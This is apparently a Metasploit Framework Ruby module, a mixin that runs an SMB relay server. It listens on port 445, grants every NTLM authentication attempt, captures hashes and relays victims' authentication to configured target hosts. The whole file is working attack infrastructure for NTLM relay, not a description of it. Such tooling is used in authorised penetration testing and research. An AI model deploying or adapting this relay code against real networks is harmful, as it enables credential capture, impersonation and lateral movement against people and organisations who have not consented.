# -*- coding: binary -*-

module Msf
  module Exploit::Remote::SMB
    # This mixin provides a minimal SMB server
    module RelayServer
      include ::Msf::Auxiliary::MultipleTargetHosts
      include ::Msf::Exploit::Remote::SocketServer
      include ::Msf::Exploit::Remote::SMB::Server::HashCapture

      def initialize(info = {})
        super

        register_options(
          [
            OptPort.new('SRVPORT', [true, 'The local port to listen on.', 445]),
            OptString.new('SMBDomain', [true, 'The domain name used during SMB exchange.', 'WORKGROUP'], aliases: ['DOMAIN_NAME']),
            OptInt.new('SRV_TIMEOUT', [true, 'Seconds that the server socket will wait for a response after the client has initiated communication.', 25]),
            OptAddressRange.new('RHOSTS', [true, 'Target address range or CIDR identifier to relay to'], aliases: ['SMBHOST', 'RELAY_TARGETS']),
            OptInt.new('RELAY_TIMEOUT', [true, 'Seconds that the relay socket will wait for a response after the client has initiated communication.', 25])
          ], self.class)
      end

      def smb_logger
        log_device = if datastore['VERBOSE']
                       Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Module.new(self)
                     else
                       Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Framework.new(framework)
                     end

        Msf::Exploit::Remote::SMB::LogAdapter::Logger.new(self, log_device)
      end

      class SMBRelayServer
        include ::Rex::Proto

        def initialize(options)
          @options = options
        end

        def alias
          super || 'SMB Relay Server'
        end

        #
        # Returns the hardcore alias for the SMB service
        #
        def self.hardcore_alias(*args)
          sock_options = sock_options_for(*args)
          "#{sock_options['LocalHost']}#{sock_options['LocalPort']}"
        end

        def start
          @listener_sock = Rex::Socket::TcpServer.create(sock_options)
          @listener_server = Msf::Exploit::Remote::SMB::Relay::NTLM::Server.new(**smb_server_options(@listener_sock))
          @listener_thread = Rex::ThreadFactory.spawn('SMBRelayServerListener', false) do
            @listener_server.run
          rescue StandardError => e
            elog(e)
          end
        end

        def stop
          begin
            @listener_server.close if @server && !@server.closed?
            @listener_thread.kill if @listener_thread
          rescue StandardError => e
            print_error('Failed closing SMB server')
            elog('Failed closing SMB server', error: e)
          end

          begin
            @listener_sock.close if @listener_sock && !@listener_sock.closed?
          rescue StandardError => e
            print_error('Failed closing SMB server socket')
            elog('Failed closing SMB server socket', error: e)
          end
        end

        #
        # This method waits on the server listener thread
        #
        def wait
          @listener_thread.join if listener_thread
        end

        attr_accessor :listener_sock, :listener_thread

        def self.sock_options_for(options)
          {
            'LocalHost' => '0.0.0.0',
            'LocalPort' => 445
          }.merge(options[:socket])
        end

        private

        def sock_options
          self.class.sock_options_for(@options)
        end

        def smb_server_options(listener_sock)
          { server_sock: listener_sock }.merge(@options[:smb_server])
        end
      end

      def start_service(_opts = {})
        ntlm_provider = Msf::Exploit::Remote::SMB::Relay::Provider::AlwaysGrantAccess.new(
          default_domain: datastore['SMBDomain']
        )

        # Set domain name for all future server responses
        ntlm_provider.dns_domain = datastore['SMBDomain']
        ntlm_provider.dns_hostname = datastore['SMBDomain']
        ntlm_provider.netbios_domain = datastore['SMBDomain']
        ntlm_provider.netbios_hostname = datastore['SMBDomain']

        validate_smb_hash_capture_datastore(datastore, ntlm_provider)

        comm = _determine_server_comm(datastore['SRVHOST'])
        print_status("SMB Server is running. Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
        @service = Rex::ServiceManager.start(
          self.class::SMBRelayServer,
          {
            socket: {
              'Comm' => comm,
              'LocalHost' => datastore['SRVHOST'],
              'LocalPort' => datastore['SRVPORT'],
              'Server' => true,
              'Timeout' => datastore['SRV_TIMEOUT'],
              'Context' => {
                'Msf' => framework,
                'MsfExploit' => self
              }
            },
            smb_server: {
              gss_provider: ntlm_provider,
              logger: smb_logger,
              relay_targets: relay_targets,
              listener: self,
              relay_timeout: datastore['RELAY_TIMEOUT'],
              thread_manager: framework.threads
            }
          }
        )
      rescue Errno::EACCES => e
        fail_with(Msf::Module::Failure::BadConfig, "Failed to create the relay server: #{e.to_s}")
      end

      def relay_targets
        raise NotImplementedError, 'the including module must define #relay_targets'
      end

      def on_relay_failure(relay_connection:)
        # noop
      end
    end
  end
end
